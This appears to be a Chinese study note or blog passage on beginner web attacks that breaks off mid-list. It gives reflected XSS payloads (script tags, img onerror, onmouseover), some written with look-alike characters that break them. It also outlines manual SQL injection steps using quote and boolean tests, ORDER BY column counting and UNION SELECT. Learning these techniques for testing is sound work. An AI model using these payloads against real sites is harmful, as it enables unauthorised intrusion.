稳而思静 慢而有为

简单型Xss‘xss就是在页面上执行你想要的js’带<input> 标签的型xss需要闭合参数才能进行注入。"><script>alert(1)</script>test"><img src=! οnerrοr=“alert(/xss/)”><a href="" οnmοuseοver=“alert(/xss/)”>xss</a>"><img src=“javascript:alert(/xss/)”

通用Sql注入通常判断是否有SQL注入点用单引号一．通用的SQL注入漏洞分为两种类型：数字型数字型判断：and 1=1 和and 1=2字符型字符型判断：and ‘1’=’1’ 和and ‘1’=’2二．猜测字段（表的列数）Order by 任意数字三．用union查询语句查询报错回显位置?id=-1’ union select (表的列数) %23（注释符）四．查询相关函数：system_user() 系统用户名user() 用户名current_user 当